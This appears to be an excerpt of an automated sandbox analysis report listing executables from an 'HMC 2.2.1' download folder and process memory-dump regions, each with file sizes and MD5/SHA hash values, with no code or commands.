SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exeFilesize
267KB
MD51b997db3ecc328b4810936099a09292b
SHA18173f84b6f76751f57258e52326339cb4c9b2d04
SHA2560c0abacc2362991a0ce199627e97d55bd45d374a0b47fc00ffda2f710a739437
SHA51292d35d076ce7f9ec2f8e3dd59a14c01a412401edb22f084a10848f725ce3b85487115d3d66a580ac4cb2a082a80d143dc794db2ee701fb8dfb85d5fe0f6a826e
-
C:\Users\Admin\Downloads\HMC 2.2.1\errorlog.exeFilesize
2.6MB
MD50bd541037d1794d63bb58654f1e897c5
SHA1a901fc2bc1fcc672b6dfee0d3e93b4ca8f11c710
SHA2562e8931e43c5674bc641651868ef311e2d3407e0132325c0795bdf4f5404fb30f
SHA51285412b5357e65ceebdd1f460e4764e3b5b11c242250500f9f55fdbaa0d2c6aa15cf0f68f7e1d88369a013a2d16c95e235db68dd48590e306de59cf01fb7128c9
-
C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exeFilesize
6.9MB
MD567bd9f22aa4be183ada57401c1c42508
SHA18310672c3b2990cc29d3b7aff0bf22dbb2183c48
SHA2564ca9efa082fda6d25b7c24ea3cd84cafb91986a3130e3d4de2348edaabf7e430
SHA51266cbe7119b7dcc75fcf24e0890fbee7aef34a0137dca45672ca6032b81a55f112b4980d7d9a83884092a394cc373da979167efac4342b790427084f2d7bd2ddc
-
C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exeFilesize
16.8MB
MD5f3068af2a33ef21d9d3c2369653d243e
SHA1f1a3aec4928e125897746bdc4941f038c5e8de03
SHA256e4cb30bd56b303d174e5416fc8b884ce722019afd0654933379cd09b0f1967b7
SHA5129f659b99b1b07c8d34e158e4725030ef40034d35a45965f149206edd0937b6eb1899a7117606db85bb879950d2386abc3f7a909856a6d1683dea486e03e142d7
-
\??\pipe\LOCAL\crashpad_3664_EJMZHHLDMQJFNYHQMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/4804-639-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmpFilesize
1.1MB
-
memory/4804-575-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmpFilesize
100KB
-
memory/4804-1010-0x00007FFA79980000-0x00007FFA799A4000-memory.dmpFilesize
144KB
-
memory/4804-1015-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmpFilesize
1.4MB
-
memory/4804-504-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmpFilesize
5.9MB
-
memory/4804-836-0x00007FFA79980000-0x00007FFA799A4000-memory.dmpFilesize
144KB
-
memory/4804-833-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmpFilesize
5.9MB
-
memory/4804-844-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmpFilesize
184KB
-
memory/4804-845-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmpFilesize
3.5MB
-
memory/4804-556-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmpFilesize
60KB
-
memory/4804-555-0x00007FFA79980000-0x00007FFA799A4000-memory.dmpFilesize
144KB
-
memory/4804-584-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmpFilesize
1.4MB
-
memory/4804-1069-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmpFilesize
60KB
-
memory/4804-1081-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmpFilesize
1.1MB
-
memory/4804-1080-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmpFilesize
52KB
-
memory/4804-1079-0x00007FFA68930000-0x00007FFA68944000-memory.dmpFilesize
80KB
-
memory/4804-1077-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmpFilesize
3.5MB
-
memory/4804-1076-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmpFilesize
184KB
-
memory/4804-1075-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmpFilesize
52KB
-
memory/4804-1074-0x00007FFA68950000-0x00007FFA68969000-memory.dmpFilesize
100KB
-
memory/4804-1073-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmpFilesize
1.4MB
-
memory/4804-1072-0x00007FFA78190000-0x00007FFA781B3000-memory.dmpFilesize
140KB
-
memory/4804-1071-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmpFilesize
100KB
-
memory/4804-1070-0x00007FFA79010000-0x00007FFA7903D000-memory.dmpFilesize
180KB
-
memory/4804-1068-0x00007FFA79980000-0x00007FFA799A4000-memory.dmpFilesize
144KB
-
memory/4804-1067-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmpFilesize
5.9MB
-
memory/4804-1078-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmpFilesize
736KB
-
memory/4804-587-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmpFilesize
184KB
-
memory/4804-593-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmpFilesize
52KB
-
memory/4804-592-0x00007FFA68930000-0x00007FFA68944000-memory.dmpFilesize
80KB
-
memory/4804-591-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmpFilesize
736KB
-
memory/4804-590-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmpFilesize
3.5MB
-
memory/4804-586-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmpFilesize
52KB
-
memory/4804-585-0x00007FFA68950000-0x00007FFA68969000-memory.dmpFilesize
100KB
-
memory/4804-577-0x00007FFA78190000-0x00007FFA781B3000-memory.dmpFilesize
140KB
-
memory/4804-846-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmpFilesize
736KB
-
memory/4804-1009-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmpFilesize
5.9MB
-
memory/4804-574-0x00007FFA79010000-0x00007FFA7903D000-memory.dmpFilesize
180KB
-
memory/4928-676-0x000001CC290F0000-0x000001CC29112000-memory.dmpFilesize
136KB
-
memory/5076-1122-0x000002646BDC0000-0x000002646BE24000-memory.dmpFilesize
400KB
-
memory/5076-1121-0x0000026466000000-0x0000026466008000-memory.dmpFilesize
32KB
-
memory/5076-1126-0x000000006D710000-0x000000006DA05000-memory.dmpFilesize
3.0MB
-
memory/5076-1125-0x000002646BD90000-0x000002646BDB6000-memory.dmpFilesize
152KB
-
memory/5076-1124-0x000002646BFD0000-0x000002646C00A000-memory.dmpFilesize
232KB
-
memory/5076-589-0x0000026446500000-0x00000264467A4000-memory.dmpFilesize
2.6MB
-
memory/5076-1007-0x00000264611D0000-0x000002646128A000-memory.dmpFilesize
744KB
-
memory/5076-640-0x0000026460E50000-0x000002646100C000-memory.dmpFilesize
1.7MB
-
memory/5076-1123-0x000002646CEB0000-0x000002646D066000-memory.dmpFilesize
1.7MB
-
memory/5076-1120-0x0000026466020000-0x0000026466040000-memory.dmpFilesize
128KB
-
memory/5076-1119-0x00000264660B0000-0x0000026466160000-memory.dmpFilesize
704KB
-
memory/5076-1066-0x00000264612E0000-0x00000264612EE000-memory.dmpFilesize
56KB
-
memory/5076-1065-0x0000026461310000-0x0000026461348000-memory.dmpFilesize
224KB
-
memory/5076-1064-0x0000026461290000-0x0000026461298000-memory.dmpFilesize
32KB
-
memory/5704-786-0x000001F198EC0000-0x000001F198EC8000-memory.dmpFilesize
32KB